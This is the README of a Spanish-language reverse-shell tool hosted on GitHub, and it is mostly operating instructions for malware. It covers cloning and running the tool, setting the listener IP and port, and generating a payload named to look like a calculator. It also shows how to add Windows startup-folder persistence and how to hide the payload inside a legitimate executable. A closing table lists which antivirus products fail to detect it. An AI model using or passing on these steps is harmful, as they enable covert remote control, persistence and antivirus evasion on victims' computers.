Proyecto que consiste en generar un payload de reverse shell en python, el cual se ejecuta en la máquina objetivo y se conecta a un servidor controlado por el atacante.
Clona el repositorio
git clone https://github.com/epmyas2022/reverse_shell.git
Entra al directorio del proyecto
cd reverse_shell
Instala las dependencias
pip install -r requirements.txt
python reverse_shell.py
help
: Muestra la lista de comandos disponibles.generate
: Genera un payload de reverse shell en python.execute
: Inicia un servidor que escucha las conexiones de los payloads generados.autoexe
: Genera un exe que creara una copia del payload en la carpeta de inicio de Windows.hiddenexe
: Genera un exe que oculta una carga dentro de otra aplicacion.set
: Establece el valor de una variable.exit
: Salir del programa.
Generar un payload de reverse shell especificando la dirección IP y el puerto del servidor
El siguiente comando setea la direccion IP del payload:
set generate.lhost 10.0.0.20
El siguiente comando setea el puerto del payload:
set generate.lport 4444
El siguiente comando genera el payload:
generate
Los payloads generados se guardan en la carpeta raíz del proyecto. con el siguiente nombre: calculator-{timestamp}
Iniciar el servidor que escucha las conexiones de los payloads generados
El siguiente comando setea el puerto del servidor:
set session.lport 4444
El siguient comando setea el host del servidor:
set session.lhost 10.0.0.20
El siguiente comando inicia el servidor:
execute
Para detener la escucha del servidor, presiona Ctrl + C
Para salir de la sesión, ejecuta el comando exit
Generar un autoexe creara una copia del payload en la carpeta de inicio de Windows.
Antes que nada, se debe generar un payload.
El siguiente comando setea el nombre del archivo:
set windows.autoexe.path <nombre_del_payload>
El siguiente comando genera el autoexe:
autoexe
Hidden exe in pocketbase
Generar un exe que oculta una carga dentro de otra aplicacion (pocketbase.exe)
Antes que nada, se debe generar un payload.
El siguiente comando setea el directorio de aplicacion:
set windows.hiddenexe.path <ruta_con_lo_que_se_quiere_ocultar>
El siguiente comando indica el nombre de exe oculto a ejecutar:
set windows.hiddenexe.payload <nombre_del_exe_oculto>
El siguiente comando indica el nombre del exe legitimo a ejecutar:
set windows.hiddenexe.app <nombre_del_exe_legitimo>
El siguiente comando genera el hidden exe:
hiddenexe
✅ = No detectado ❌ = Detectado
- Windows Defender [✅]
- Avast [✅]
- ESETNOD32 [✅]
- McAfee [✅]
- Bitdefender [✅]
- Bkav Pro [❌]
- SecureAge [❌]
- Kaspersky [❌]
- Skyhigh (SWG) [❌]